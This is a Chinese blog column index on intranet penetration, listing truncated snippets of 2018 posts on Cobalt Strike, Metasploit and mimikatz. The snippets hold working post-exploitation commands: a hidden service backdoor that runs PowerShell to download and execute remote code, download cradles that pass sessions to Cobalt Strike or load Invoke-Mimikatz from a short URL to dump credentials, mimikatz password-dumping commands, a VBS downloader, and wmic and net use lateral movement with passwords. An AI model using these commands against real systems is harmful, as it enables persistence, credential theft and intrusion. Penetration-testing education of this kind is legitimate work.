
内网渗透
mirror97black
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
内网渗透之收集信息
收集本机ip信息ipconfig /all查看进程,注意杀软tasklist /v查看安装软件的版本(两种方式)wmic product > version.txt利用wmic命令,可以将结果输出到文本中powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name,...原创 2018-04-08 23:08:56 · 1805 阅读 · 0 评论 -
cobalt strike开机自启动后门
前提:拿到cobalt strike的session设置开机自启动服务使用sc命令创建服务sc create "Windows Power" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.1...原创 2018-04-09 10:54:52 · 5409 阅读 · 2 评论 -
利用cobalt strike获取域控权限
cobalt strikecobalt strike是一个后渗透工具,和msf有很多相似的地方,也可以看做是一个远控工具。前期准备获取一个cobalt strike的会话。可以利用cs本身的payload,或者是通过别的shell反弹到cs。域内收集信息通过一些cmd命令,可以收集到域内的信息 在cs的会话中,执行命令 查看有多少域和工作组shell net...原创 2018-04-02 22:20:48 · 2466 阅读 · 0 评论 -
windows命令行下载文件
vbs下载通过写一个vbs脚本来下载文件 在windows机器中,命令行执行以下各条命令echo Set Post = CreateObject("Msxml2.XMLHTTP") >>zl.vbsecho Set Shell = CreateObject("Wscript.Shell") >>zl.vbsecho Post.Open "GET","htt...原创 2018-04-03 14:29:48 · 3683 阅读 · 0 评论 -
mimikatz使用
mimikatz使用时需要高权限,至少是administrator权限 mimikatz抓取密码的命令需要system权限,可以先进行提权privilege::debug //提升权限(从administrator提升到system)抓取hashsekurlsa::logonpasswords //获取当前在线用户的明文密码(需要高权限运行)lsadump::lsa ...原创 2018-04-11 16:46:48 · 7239 阅读 · 0 评论 -
msf传递shell给cobalt strike
前提:拿到msf的session会话 方法1:在cmd中执行cobalt strike的scripted web delivery命令,比如powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.10.20:80/a'))"方法2:通过msf的expl...原创 2018-04-11 17:02:10 · 2354 阅读 · 1 评论 -
内网渗透技巧
通过powershell 运行mimikatzpowershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" 获取hash之后,解出明文密码 将目标机器共享盘映射到本地的h盘net use h: \\ip\c$ "密码"...原创 2018-04-04 15:53:19 · 601 阅读 · 0 评论 -
远程连接windows
3389在windows-运行,输入mstsc,回车即可 需要对方开启3389端口,并且你有对方机器的用户名和密码wmic远程连接wmic /node:"192.168.2.23" /password:"abc123" /user:"administrator"如果能够远程连接成功,就可以执行一些wmic命令wmic /node:"192.168.2.23" /p...原创 2018-04-17 14:05:22 · 2010 阅读 · 0 评论